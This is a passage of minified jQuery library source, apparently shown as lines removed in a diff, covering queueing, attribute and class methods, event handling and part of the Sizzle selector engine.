-a,b)})},removeData:function(a){return this.each(function(){c.removeData(this,a)})}});c.extend({queue:function(a,b,d){if(a){b=(b||"fx")+"queue";var f=c.data(a,b);if(!d)return f||[];if(!f||c.isArray(d))f=c.data(a,b,c.makeArray(d));else f.push(d);return f}},dequeue:function(a,b){b=b||"fx";var d=c.queue(a,b),f=d.shift();if(f==="inprogress")f=d.shift();if(f){b==="fx"&&d.unshift("inprogress");f.call(a,function(){c.dequeue(a,b)})}}});c.fn.extend({queue:function(a,b){if(typeof a!=="string"){b=a;a="fx"}if(b===
-w)return c.queue(this[0],a);return this.each(function(){var d=c.queue(this,a,b);a==="fx"&&d[0]!=="inprogress"&&c.dequeue(this,a)})},dequeue:function(a){return this.each(function(){c.dequeue(this,a)})},delay:function(a,b){a=c.fx?c.fx.speeds[a]||a:a;b=b||"fx";return this.queue(b,function(){var d=this;setTimeout(function(){c.dequeue(d,b)},a)})},clearQueue:function(a){return this.queue(a||"fx",[])}});var Aa=/[\n\t]/g,ca=/\s+/,Za=/\r/g,$a=/href|src|style/,ab=/(button|input)/i,bb=/(button|input|object|select|textarea)/i,
-cb=/^(a|area)$/i,Ba=/radio|checkbox/;c.fn.extend({attr:function(a,b){return X(this,a,b,true,c.attr)},removeAttr:function(a){return this.each(function(){c.attr(this,a,"");this.nodeType===1&&this.removeAttribute(a)})},addClass:function(a){if(c.isFunction(a))return this.each(function(n){var r=c(this);r.addClass(a.call(this,n,r.attr("class")))});if(a&&typeof a==="string")for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1)if(e.className){for(var j=" "+e.className+" ",
-i=e.className,o=0,k=b.length;o<k;o++)if(j.indexOf(" "+b[o]+" ")<0)i+=" "+b[o];e.className=c.trim(i)}else e.className=a}return this},removeClass:function(a){if(c.isFunction(a))return this.each(function(k){var n=c(this);n.removeClass(a.call(this,k,n.attr("class")))});if(a&&typeof a==="string"||a===w)for(var b=(a||"").split(ca),d=0,f=this.length;d<f;d++){var e=this[d];if(e.nodeType===1&&e.className)if(a){for(var j=(" "+e.className+" ").replace(Aa," "),i=0,o=b.length;i<o;i++)j=j.replace(" "+b[i]+" ",
-" ");e.className=c.trim(j)}else e.className=""}return this},toggleClass:function(a,b){var d=typeof a,f=typeof b==="boolean";if(c.isFunction(a))return this.each(function(e){var j=c(this);j.toggleClass(a.call(this,e,j.attr("class"),b),b)});return this.each(function(){if(d==="string")for(var e,j=0,i=c(this),o=b,k=a.split(ca);e=k[j++];){o=f?o:!i.hasClass(e);i[o?"addClass":"removeClass"](e)}else if(d==="undefined"||d==="boolean"){this.className&&c.data(this,"__className__",this.className);this.className=
-this.className||a===false?"":c.data(this,"__className__")||""}})},hasClass:function(a){a=" "+a+" ";for(var b=0,d=this.length;b<d;b++)if((" "+this[b].className+" ").replace(Aa," ").indexOf(a)>-1)return true;return false},val:function(a){if(a===w){var b=this[0];if(b){if(c.nodeName(b,"option"))return(b.attributes.value||{}).specified?b.value:b.text;if(c.nodeName(b,"select")){var d=b.selectedIndex,f=[],e=b.options;b=b.type==="select-one";if(d<0)return null;var j=b?d:0;for(d=b?d+1:e.length;j<d;j++){var i=
-e[j];if(i.selected){a=c(i).val();if(b)return a;f.push(a)}}return f}if(Ba.test(b.type)&&!c.support.checkOn)return b.getAttribute("value")===null?"on":b.value;return(b.value||"").replace(Za,"")}return w}var o=c.isFunction(a);return this.each(function(k){var n=c(this),r=a;if(this.nodeType===1){if(o)r=a.call(this,k,n.val());if(typeof r==="number")r+="";if(c.isArray(r)&&Ba.test(this.type))this.checked=c.inArray(n.val(),r)>=0;else if(c.nodeName(this,"select")){var u=c.makeArray(r);c("option",this).each(function(){this.selected=
-c.inArray(c(this).val(),u)>=0});if(!u.length)this.selectedIndex=-1}else this.value=r}})}});c.extend({attrFn:{val:true,css:true,html:true,text:true,data:true,width:true,height:true,offset:true},attr:function(a,b,d,f){if(!a||a.nodeType===3||a.nodeType===8)return w;if(f&&b in c.attrFn)return c(a)[b](d);f=a.nodeType!==1||!c.isXMLDoc(a);var e=d!==w;b=f&&c.props[b]||b;if(a.nodeType===1){var j=$a.test(b);if(b in a&&f&&!j){if(e){b==="type"&&ab.test(a.nodeName)&&a.parentNode&&c.error("type property can't be changed");
-a[b]=d}if(c.nodeName(a,"form")&&a.getAttributeNode(b))return a.getAttributeNode(b).nodeValue;if(b==="tabIndex")return(b=a.getAttributeNode("tabIndex"))&&b.specified?b.value:bb.test(a.nodeName)||cb.test(a.nodeName)&&a.href?0:w;return a[b]}if(!c.support.style&&f&&b==="style"){if(e)a.style.cssText=""+d;return a.style.cssText}e&&a.setAttribute(b,""+d);a=!c.support.hrefNormalized&&f&&j?a.getAttribute(b,2):a.getAttribute(b);return a===null?w:a}return c.style(a,b,d)}});var O=/\.(.*)$/,db=function(a){return a.replace(/[^\w\s\.\|`]/g,
-function(b){return"\\"+b})};c.event={add:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){if(a.setInterval&&a!==A&&!a.frameElement)a=A;var e,j;if(d.handler){e=d;d=e.handler}if(!d.guid)d.guid=c.guid++;if(j=c.data(a)){var i=j.events=j.events||{},o=j.handle;if(!o)j.handle=o=function(){return typeof c!=="undefined"&&!c.event.triggered?c.event.handle.apply(o.elem,arguments):w};o.elem=a;b=b.split(" ");for(var k,n=0,r;k=b[n++];){j=e?c.extend({},e):{handler:d,data:f};if(k.indexOf(".")>-1){r=k.split(".");
-k=r.shift();j.namespace=r.slice(0).sort().join(".")}else{r=[];j.namespace=""}j.type=k;j.guid=d.guid;var u=i[k],z=c.event.special[k]||{};if(!u){u=i[k]=[];if(!z.setup||z.setup.call(a,f,r,o)===false)if(a.addEventListener)a.addEventListener(k,o,false);else a.attachEvent&&a.attachEvent("on"+k,o)}if(z.add){z.add.call(a,j);if(!j.handler.guid)j.handler.guid=d.guid}u.push(j);c.event.global[k]=true}a=null}}},global:{},remove:function(a,b,d,f){if(!(a.nodeType===3||a.nodeType===8)){var e,j=0,i,o,k,n,r,u,z=c.data(a),
-C=z&&z.events;if(z&&C){if(b&&b.type){d=b.handler;b=b.type}if(!b||typeof b==="string"&&b.charAt(0)==="."){b=b||"";for(e in C)c.event.remove(a,e+b)}else{for(b=b.split(" ");e=b[j++];){n=e;i=e.indexOf(".")<0;o=[];if(!i){o=e.split(".");e=o.shift();k=new RegExp("(^|\\.)"+c.map(o.slice(0).sort(),db).join("\\.(?:.*\\.)?")+"(\\.|$)")}if(r=C[e])if(d){n=c.event.special[e]||{};for(B=f||0;B<r.length;B++){u=r[B];if(d.guid===u.guid){if(i||k.test(u.namespace)){f==null&&r.splice(B--,1);n.remove&&n.remove.call(a,u)}if(f!=
-null)break}}if(r.length===0||f!=null&&r.length===1){if(!n.teardown||n.teardown.call(a,o)===false)Ca(a,e,z.handle);delete C[e]}}else for(var B=0;B<r.length;B++){u=r[B];if(i||k.test(u.namespace)){c.event.remove(a,n,u.handler,B);r.splice(B--,1)}}}if(c.isEmptyObject(C)){if(b=z.handle)b.elem=null;delete z.events;delete z.handle;c.isEmptyObject(z)&&c.removeData(a)}}}}},trigger:function(a,b,d,f){var e=a.type||a;if(!f){a=typeof a==="object"?a[G]?a:c.extend(c.Event(e),a):c.Event(e);if(e.indexOf("!")>=0){a.type=
-e=e.slice(0,-1);a.exclusive=true}if(!d){a.stopPropagation();c.event.global[e]&&c.each(c.cache,function(){this.events&&this.events[e]&&c.event.trigger(a,b,this.handle.elem)})}if(!d||d.nodeType===3||d.nodeType===8)return w;a.result=w;a.target=d;b=c.makeArray(b);b.unshift(a)}a.currentTarget=d;(f=c.data(d,"handle"))&&f.apply(d,b);f=d.parentNode||d.ownerDocument;try{if(!(d&&d.nodeName&&c.noData[d.nodeName.toLowerCase()]))if(d["on"+e]&&d["on"+e].apply(d,b)===false)a.result=false}catch(j){}if(!a.isPropagationStopped()&&
-f)c.event.trigger(a,b,f,true);else if(!a.isDefaultPrevented()){f=a.target;var i,o=c.nodeName(f,"a")&&e==="click",k=c.event.special[e]||{};if((!k._default||k._default.call(d,a)===false)&&!o&&!(f&&f.nodeName&&c.noData[f.nodeName.toLowerCase()])){try{if(f[e]){if(i=f["on"+e])f["on"+e]=null;c.event.triggered=true;f[e]()}}catch(n){}if(i)f["on"+e]=i;c.event.triggered=false}}},handle:function(a){var b,d,f,e;a=arguments[0]=c.event.fix(a||A.event);a.currentTarget=this;b=a.type.indexOf(".")<0&&!a.exclusive;
-if(!b){d=a.type.split(".");a.type=d.shift();f=new RegExp("(^|\\.)"+d.slice(0).sort().join("\\.(?:.*\\.)?")+"(\\.|$)")}e=c.data(this,"events");d=e[a.type];if(e&&d){d=d.slice(0);e=0;for(var j=d.length;e<j;e++){var i=d[e];if(b||f.test(i.namespace)){a.handler=i.handler;a.data=i.data;a.handleObj=i;i=i.handler.apply(this,arguments);if(i!==w){a.result=i;if(i===false){a.preventDefault();a.stopPropagation()}}if(a.isImmediatePropagationStopped())break}}}return a.result},props:"altKey attrChange attrName bubbles button cancelable charCode clientX clientY ctrlKey currentTarget data detail eventPhase fromElement handler keyCode layerX layerY metaKey newValue offsetX offsetY originalTarget pageX pageY prevValue relatedNode relatedTarget screenX screenY shiftKey srcElement target toElement view wheelDelta which".split(" "),
-fix:function(a){if(a[G])return a;var b=a;a=c.Event(b);for(var d=this.props.length,f;d;){f=this.props[--d];a[f]=b[f]}if(!a.target)a.target=a.srcElement||s;if(a.target.nodeType===3)a.target=a.target.parentNode;if(!a.relatedTarget&&a.fromElement)a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement;if(a.pageX==null&&a.clientX!=null){b=s.documentElement;d=s.body;a.pageX=a.clientX+(b&&b.scrollLeft||d&&d.scrollLeft||0)-(b&&b.clientLeft||d&&d.clientLeft||0);a.pageY=a.clientY+(b&&b.scrollTop||
-d&&d.scrollTop||0)-(b&&b.clientTop||d&&d.clientTop||0)}if(!a.which&&(a.charCode||a.charCode===0?a.charCode:a.keyCode))a.which=a.charCode||a.keyCode;if(!a.metaKey&&a.ctrlKey)a.metaKey=a.ctrlKey;if(!a.which&&a.button!==w)a.which=a.button&1?1:a.button&2?3:a.button&4?2:0;return a},guid:1E8,proxy:c.proxy,special:{ready:{setup:c.bindReady,teardown:c.noop},live:{add:function(a){c.event.add(this,a.origType,c.extend({},a,{handler:oa}))},remove:function(a){var b=true,d=a.origType.replace(O,"");c.each(c.data(this,
-"events").live||[],function(){if(d===this.origType.replace(O,""))return b=false});b&&c.event.remove(this,a.origType,oa)}},beforeunload:{setup:function(a,b,d){if(this.setInterval)this.onbeforeunload=d;return false},teardown:function(a,b){if(this.onbeforeunload===b)this.onbeforeunload=null}}}};var Ca=s.removeEventListener?function(a,b,d){a.removeEventListener(b,d,false)}:function(a,b,d){a.detachEvent("on"+b,d)};c.Event=function(a){if(!this.preventDefault)return new c.Event(a);if(a&&a.type){this.originalEvent=
-a;this.type=a.type}else this.type=a;this.timeStamp=J();this[G]=true};c.Event.prototype={preventDefault:function(){this.isDefaultPrevented=Z;var a=this.originalEvent;if(a){a.preventDefault&&a.preventDefault();a.returnValue=false}},stopPropagation:function(){this.isPropagationStopped=Z;var a=this.originalEvent;if(a){a.stopPropagation&&a.stopPropagation();a.cancelBubble=true}},stopImmediatePropagation:function(){this.isImmediatePropagationStopped=Z;this.stopPropagation()},isDefaultPrevented:Y,isPropagationStopped:Y,
-isImmediatePropagationStopped:Y};var Da=function(a){var b=a.relatedTarget;try{for(;b&&b!==this;)b=b.parentNode;if(b!==this){a.type=a.data;c.event.handle.apply(this,arguments)}}catch(d){}},Ea=function(a){a.type=a.data;c.event.handle.apply(this,arguments)};c.each({mouseenter:"mouseover",mouseleave:"mouseout"},function(a,b){c.event.special[a]={setup:function(d){c.event.add(this,b,d&&d.selector?Ea:Da,a)},teardown:function(d){c.event.remove(this,b,d&&d.selector?Ea:Da)}}});if(!c.support.submitBubbles)c.event.special.submit=
-{setup:function(){if(this.nodeName.toLowerCase()!=="form"){c.event.add(this,"click.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="submit"||d==="image")&&c(b).closest("form").length)return na("submit",this,arguments)});c.event.add(this,"keypress.specialSubmit",function(a){var b=a.target,d=b.type;if((d==="text"||d==="password")&&c(b).closest("form").length&&a.keyCode===13)return na("submit",this,arguments)})}else return false},teardown:function(){c.event.remove(this,".specialSubmit")}};
-if(!c.support.changeBubbles){var da=/textarea|input|select/i,ea,Fa=function(a){var b=a.type,d=a.value;if(b==="radio"||b==="checkbox")d=a.checked;else if(b==="select-multiple")d=a.selectedIndex>-1?c.map(a.options,function(f){return f.selected}).join("-"):"";else if(a.nodeName.toLowerCase()==="select")d=a.selectedIndex;return d},fa=function(a,b){var d=a.target,f,e;if(!(!da.test(d.nodeName)||d.readOnly)){f=c.data(d,"_change_data");e=Fa(d);if(a.type!=="focusout"||d.type!=="radio")c.data(d,"_change_data",
-e);if(!(f===w||e===f))if(f!=null||e){a.type="change";return c.event.trigger(a,b,d)}}};c.event.special.change={filters:{focusout:fa,click:function(a){var b=a.target,d=b.type;if(d==="radio"||d==="checkbox"||b.nodeName.toLowerCase()==="select")return fa.call(this,a)},keydown:function(a){var b=a.target,d=b.type;if(a.keyCode===13&&b.nodeName.toLowerCase()!=="textarea"||a.keyCode===32&&(d==="checkbox"||d==="radio")||d==="select-multiple")return fa.call(this,a)},beforeactivate:function(a){a=a.target;c.data(a,
-"_change_data",Fa(a))}},setup:function(){if(this.type==="file")return false;for(var a in ea)c.event.add(this,a+".specialChange",ea[a]);return da.test(this.nodeName)},teardown:function(){c.event.remove(this,".specialChange");return da.test(this.nodeName)}};ea=c.event.special.change.filters}s.addEventListener&&c.each({focus:"focusin",blur:"focusout"},function(a,b){function d(f){f=c.event.fix(f);f.type=b;return c.event.handle.call(this,f)}c.event.special[b]={setup:function(){this.addEventListener(a,
-d,true)},teardown:function(){this.removeEventListener(a,d,true)}}});c.each(["bind","one"],function(a,b){c.fn[b]=function(d,f,e){if(typeof d==="object"){for(var j in d)this[b](j,f,d[j],e);return this}if(c.isFunction(f)){e=f;f=w}var i=b==="one"?c.proxy(e,function(k){c(this).unbind(k,i);return e.apply(this,arguments)}):e;if(d==="unload"&&b!=="one")this.one(d,f,e);else{j=0;for(var o=this.length;j<o;j++)c.event.add(this[j],d,i,f)}return this}});c.fn.extend({unbind:function(a,b){if(typeof a==="object"&&
-!a.preventDefault)for(var d in a)this.unbind(d,a[d]);else{d=0;for(var f=this.length;d<f;d++)c.event.remove(this[d],a,b)}return this},delegate:function(a,b,d,f){return this.live(b,d,f,a)},undelegate:function(a,b,d){return arguments.length===0?this.unbind("live"):this.die(b,null,d,a)},trigger:function(a,b){return this.each(function(){c.event.trigger(a,b,this)})},triggerHandler:function(a,b){if(this[0]){a=c.Event(a);a.preventDefault();a.stopPropagation();c.event.trigger(a,b,this[0]);return a.result}},
-toggle:function(a){for(var b=arguments,d=1;d<b.length;)c.proxy(a,b[d++]);return this.click(c.proxy(a,function(f){var e=(c.data(this,"lastToggle"+a.guid)||0)%d;c.data(this,"lastToggle"+a.guid,e+1);f.preventDefault();return b[e].apply(this,arguments)||false}))},hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}});var Ga={focus:"focusin",blur:"focusout",mouseenter:"mouseover",mouseleave:"mouseout"};c.each(["live","die"],function(a,b){c.fn[b]=function(d,f,e,j){var i,o=0,k,n,r=j||this.selector,
-u=j?this:c(this.context);if(c.isFunction(f)){e=f;f=w}for(d=(d||"").split(" ");(i=d[o++])!=null;){j=O.exec(i);k="";if(j){k=j[0];i=i.replace(O,"")}if(i==="hover")d.push("mouseenter"+k,"mouseleave"+k);else{n=i;if(i==="focus"||i==="blur"){d.push(Ga[i]+k);i+=k}else i=(Ga[i]||i)+k;b==="live"?u.each(function(){c.event.add(this,pa(i,r),{data:f,selector:r,handler:e,origType:i,origHandler:e,preType:n})}):u.unbind(pa(i,r),e)}}return this}});c.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error".split(" "),
-function(a,b){c.fn[b]=function(d){return d?this.bind(b,d):this.trigger(b)};if(c.attrFn)c.attrFn[b]=true});A.attachEvent&&!A.addEventListener&&A.attachEvent("onunload",function(){for(var a in c.cache)if(c.cache[a].handle)try{c.event.remove(c.cache[a].handle.elem)}catch(b){}});(function(){function a(g){for(var h="",l,m=0;g[m];m++){l=g[m];if(l.nodeType===3||l.nodeType===4)h+=l.nodeValue;else if(l.nodeType!==8)h+=a(l.childNodes)}return h}function b(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q];
-if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1&&!p){t.sizcache=l;t.sizset=q}if(t.nodeName.toLowerCase()===h){y=t;break}t=t[g]}m[q]=y}}}function d(g,h,l,m,q,p){q=0;for(var v=m.length;q<v;q++){var t=m[q];if(t){t=t[g];for(var y=false;t;){if(t.sizcache===l){y=m[t.sizset];break}if(t.nodeType===1){if(!p){t.sizcache=l;t.sizset=q}if(typeof h!=="string"){if(t===h){y=true;break}}else if(k.filter(h,[t]).length>0){y=t;break}}t=t[g]}m[q]=y}}}var f=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,
-e=0,j=Object.prototype.toString,i=false,o=true;[0,0].sort(function(){o=false;return 0});var k=function(g,h,l,m){l=l||[];var q=h=h||s;if(h.nodeType!==1&&h.nodeType!==9)return[];if(!g||typeof g!=="string")return l;for(var p=[],v,t,y,S,H=true,M=x(h),I=g;(f.exec(""),v=f.exec(I))!==null;){I=v[3];p.push(v[1]);if(v[2]){S=v[3];break}}if(p.length>1&&r.exec(g))if(p.length===2&&n.relative[p[0]])t=ga(p[0]+p[1],h);else for(t=n.relative[p[0]]?[h]:k(p.shift(),h);p.length;){g=p.shift();if(n.relative[g])g+=p.shift();
-t=ga(g,t)}else{if(!m&&p.length>1&&h.nodeType===9&&!M&&n.match.ID.test(p[0])&&!n.match.ID.test(p[p.length-1])){v=k.find(p.shift(),h,M);h=v.expr?k.filter(v.expr,v.set)[0]:v.set[0]}if(h){v=m?{expr:p.pop(),set:z(m)}:k.find(p.pop(),p.length===1&&(p[0]==="~"||p[0]==="+")&&h.parentNode?h.parentNode:h,M);t=v.expr?k.filter(v.expr,v.set):v.set;if(p.length>0)y=z(t);else H=false;for(;p.length;){var D=p.pop();v=D;if(n.relative[D])v=p.pop();else D="";if(v==null)v=h;n.relative[D](y,v,M)}}else y=[]}y||(y=t);y||k.error(D||
-g);if(j.call(y)==="[object Array]")if(H)if(h&&h.nodeType===1)for(g=0;y[g]!=null;g++){if(y[g]&&(y[g]===true||y[g].nodeType===1&&E(h,y[g])))l.push(t[g])}else for(g=0;y[g]!=null;g++)y[g]&&y[g].nodeType===1&&l.push(t[g]);else l.push.apply(l,y);else z(y,l);if(S){k(S,q,l,m);k.uniqueSort(l)}return l};k.uniqueSort=function(g){if(B){i=o;g.sort(B);if(i)for(var h=1;h<g.length;h++)g[h]===g[h-1]&&g.splice(h--,1)}return g};k.matches=function(g,h){return k(g,null,null,h)};k.find=function(g,h,l){var m,q;if(!g)return[];
-for(var p=0,v=n.order.length;p<v;p++){var t=n.order[p];if(q=n.leftMatch[t].exec(g)){var y=q[1];q.splice(1,1);if(y.substr(y.length-1)!=="\\"){q[1]=(q[1]||"").replace(/\\/g,"");m=n.find[t](q,h,l);if(m!=null){g=g.replace(n.match[t],"");break}}}}m||(m=h.getElementsByTagName("*"));return{set:m,expr:g}};k.filter=function(g,h,l,m){for(var q=g,p=[],v=h,t,y,S=h&&h[0]&&x(h[0]);g&&h.length;){for(var H in n.filter)if((t=n.leftMatch[H].exec(g))!=null&&t[2]){var M=n.filter[H],I,D;D=t[1];y=false;t.splice(1,1);if(D.substr(D.length-
-1)!=="\\"){if(v===p)p=[];if(n.preFilter[H])if(t=n.preFilter[H](t,v,l,p,m,S)){if(t===true)continue}else y=I=true;if(t)for(var U=0;(D=v[U])!=null;U++)if(D){I=M(D,t,U,v);var Ha=m^!!I;if(l&&I!=null)if(Ha)y=true;else v[U]=false;else if(Ha){p.push(D);y=true}}if(I!==w){l||(v=p);g=g.replace(n.match[H],"");if(!y)return[];break}}}if(g===q)if(y==null)k.error(g);else break;q=g}return v};k.error=function(g){throw"Syntax error, unrecognized expression: "+g;};var n=k.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,
-CLASS:/\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(g){return g.getAttribute("href")}},
-relative:{"+":function(g,h){var l=typeof h==="string",m=l&&!/\W/.test(h);l=l&&!m;if(m)h=h.toLowerCase();m=0;for(var q=g.length,p;m<q;m++)if(p=g[m]){for(;(p=p.previousSibling)&&p.nodeType!==1;);g[m]=l||p&&p.nodeName.toLowerCase()===h?p||false:p===h}l&&k.filter(h,g,true)},">":function(g,h){var l=typeof h==="string";if(l&&!/\W/.test(h)){h=h.toLowerCase();for(var m=0,q=g.length;m<q;m++){var p=g[m];if(p){l=p.parentNode;g[m]=l.nodeName.toLowerCase()===h?l:false}}}else{m=0;for(q=g.length;m<q;m++)if(p=g[m])g[m]=
-l?p.parentNode:p.parentNode===h;l&&k.filter(h,g,true)}},"":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("parentNode",h,m,g,p,l)},"~":function(g,h,l){var m=e++,q=d;if(typeof h==="string"&&!/\W/.test(h)){var p=h=h.toLowerCase();q=b}q("previousSibling",h,m,g,p,l)}},find:{ID:function(g,h,l){if(typeof h.getElementById!=="undefined"&&!l)return(g=h.getElementById(g[1]))?[g]:[]},NAME:function(g,h){if(typeof h.getElementsByName!=="undefined"){var l=[];
-h=h.getElementsByName(g[1]);for(var m=0,q=h.length;m<q;m++)h[m].getAttribute("name")===g[1]&&l.push(h[m]);return l.length===0?null:l}},TAG:function(g,h){return h.getElementsByTagName(g[1])}},preFilter:{CLASS:function(g,h,l,m,q,p){g=" "+g[1].replace(/\\/g,"")+" ";if(p)return g;p=0;for(var v;(v=h[p])!=null;p++)if(v)if(q^(v.className&&(" "+v.className+" ").replace(/[\t\n]/g," ").indexOf(g)>=0))l||m.push(v);else if(l)h[p]=false;return false},ID:function(g){return g[1].replace(/\\/g,"")},TAG:function(g){return g[1].toLowerCase()},
-CHILD:function(g){if(g[1]==="nth"){var h=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(g[2]==="even"&&"2n"||g[2]==="odd"&&"2n+1"||!/\D/.test(g[2])&&"0n+"+g[2]||g[2]);g[2]=h[1]+(h[2]||1)-0;g[3]=h[3]-0}g[0]=e++;return g},ATTR:function(g,h,l,m,q,p){h=g[1].replace(/\\/g,"");if(!p&&n.attrMap[h])g[1]=n.attrMap[h];if(g[2]==="~=")g[4]=" "+g[4]+" ";return g},PSEUDO:function(g,h,l,m,q){if(g[1]==="not")if((f.exec(g[3])||"").length>1||/^\w/.test(g[3]))g[3]=k(g[3],null,null,h);else{g=k.filter(g[3],h,l,true^q);l||m.push.apply(m,
-g);return false}else if(n.match.POS.test(g[0])||n.match.CHILD.test(g[0]))return true;return g},POS:function(g){g.unshift(true);return g}},filters:{enabled:function(g){return g.disabled===false&&g.type!=="hidden"},disabled:function(g){return g.disabled===true},checked:function(g){return g.checked===true},selected:function(g){return g.selected===true},parent:function(g){return!!g.firstChild},empty:function(g){return!g.firstChild},has:function(g,h,l){return!!k(l[3],g).length},header:function(g){return/h\d/i.test(g.nodeName)},
-text:function(g){return"text"===g.type},radio:function(g){return"radio"===g.type},checkbox:function(g){return"checkbox"===g.type},file:function(g){return"file"===g.type},password:function(g){return"password"===g.type},submit:function(g){return"submit"===g.type},image:function(g){return"image"===g.type},reset:function(g){return"reset"===g.type},button:function(g){return"button"===g.type||g.nodeName.toLowerCase()==="button"},input:function(g){return/input|select|textarea|button/i.test(g.nodeName)}},
-setFilters:{first:function(g,h){return h===0},last:function(g,h,l,m){return h===m.length-1},even:function(g,h){return h%2===0},odd:function(g,h){return h%2===1},lt:function(g,h,l){return h<l[3]-0},gt:function(g,h,l){return h>l[3]-0},nth:function(g,h,l){return l[3]-0===h},eq:function(g,h,l){return l[3]-0===h}},filter:{PSEUDO:function(g,h,l,m){var q=h[1],p=n.filters[q];if(p)return p(g,l,h,m);else if(q==="contains")return(g.textContent||g.innerText||a([g])||"").indexOf(h[3])>=0;else if(q==="not"){h=
-h[3];l=0;for(m=h.length;l<m;l++)if(h[l]===g)return false;return true}else k.error("Syntax error, unrecognized expression: "+q)},CHILD:function(g,h){var l=h[1],m=g;switch(l){case "only":case "first":for(;m=m.previousSibling;)if(m.nodeType===1)return false;if(l==="first")return true;m=g;case "last":for(;m=m.nextSibling;)if(m.nodeType===1)return false;return true;case "nth":l=h[2];var q=h[3];if(l===1&&q===0)return true;h=h[0];var p=g.parentNode;if(p&&(p.sizcache!==h||!g.nodeIndex)){var v=0;for(m=p.firstChild;m;m=
-m.nextSibling)if(m.nodeType===1)m.nodeIndex=++v;p.sizcache=h}g=g.nodeIndex-q;return l===0?g===0:g%l===0&&g/l>=0}},ID:function(g,h){return g.nodeType===1&&g.getAttribute("id")===h},TAG:function(g,h){return h==="*"&&g.nodeType===1||g.nodeName.toLowerCase()===h},CLASS:function(g,h){return(" "+(g.className||g.getAttribute("class"))+" ").indexOf(h)>-1},ATTR:function(g,h){var l=h[1];g=n.attrHandle[l]?n.attrHandle[l](g):g[l]!=null?g[l]:g.getAttribute(l);l=g+"";var m=h[2];h=h[4];return g==null?m==="!=":m===
-"="?l===h:m==="*="?l.indexOf(h)>=0:m==="~="?(" "+l+" ").indexOf(h)>=0:!h?l&&g!==false:m==="!="?l!==h:m==="^="?l.indexOf(h)===0:m==="$="?l.substr(l.length-h.length)===h:m==="|="?l===h||l.substr(0,h.length+1)===h+"-":false},POS:function(g,h,l,m){var q=n.setFilters[h[2]];if(q)return q(g,l,h,m)}}},r=n.match.POS;for(var u in n.match){n.match[u]=new RegExp(n.match[u].source+/(?![^\[]*\])(?![^\(]*\))/.source);n.leftMatch[u]=new RegExp(/(^(?:.|\r|\n)*?)/.source+n.match[u].source.replace(/\\(\d+)/g,function(g,
-h){return"\\"+(h-0+1)}))}var z=function(g,h){g=Array.prototype.slice.call(g,0);if(h){h.push.apply(h,g);return h}return g};try{Array.prototype.slice.call(s.documentElement.childNodes,0)}catch(C){z=function(g,h){h=h||[];if(j.call(g)==="[object Array]")Array.prototype.push.apply(h,g);else if(typeof g.length==="number")for(var l=0,m=g.length;l<m;l++)h.push(g[l]);else for(l=0;g[l];l++)h.push(g[l]);return h}}var B;if(s.documentElement.compareDocumentPosition)B=function(g,h){if(!g.compareDocumentPosition||
-!h.compareDocumentPosition){if(g==h)i=true;return g.compareDocumentPosition?-1:1}g=g.compareDocumentPosition(h)&4?-1:g===h?0:1;if(g===0)i=true;return g};else if("sourceIndex"in s.documentElement)B=function(g,h){if(!g.sourceIndex||!h.sourceIndex){if(g==h)i=true;return g.sourceIndex?-1:1}g=g.sourceIndex-h.sourceIndex;if(g===0)i=true;return g};else if(s.createRange)B=function(g,h){if(!g.ownerDocument||!h.ownerDocument){if(g==h)i=true;return g.ownerDocument?-1:1}var l=g.ownerDocument.createRange(),m=
-h.ownerDocument.createRange();l.setStart(g,0);l.setEnd(g,0);m.setStart(h,0);m.setEnd(h,0);g=l.compareBoundaryPoints(Range.START_TO_END,m);if(g===0)i=true;return g};(function(){var g=s.createElement("div"),h="script"+(new Date).getTime();g.innerHTML="<a name='"+h+"'/>";var l=s.documentElement;l.insertBefore(g,l.firstChild);if(s.getElementById(h)){n.find.ID=function(m,q,p){if(typeof q.getElementById!=="undefined"&&!p)return(q=q.getElementById(m[1]))?q.id===m[1]||typeof q.getAttributeNode!=="undefined"&&
-q.getAttributeNode("id").nodeValue===m[1]?[q]:w:[]};n.filter.ID=function(m,q){var p=typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id");return m.nodeType===1&&p&&p.nodeValue===q}}l.removeChild(g);l=g=null})();(function(){var g=s.createElement("div");g.appendChild(s.createComment(""));if(g.getElementsByTagName("*").length>0)n.find.TAG=function(h,l){l=l.getElementsByTagName(h[1]);if(h[1]==="*"){h=[];for(var m=0;l[m];m++)l[m].nodeType===1&&h.push(l[m]);l=h}return l};g.innerHTML="<a href='#'></a>";
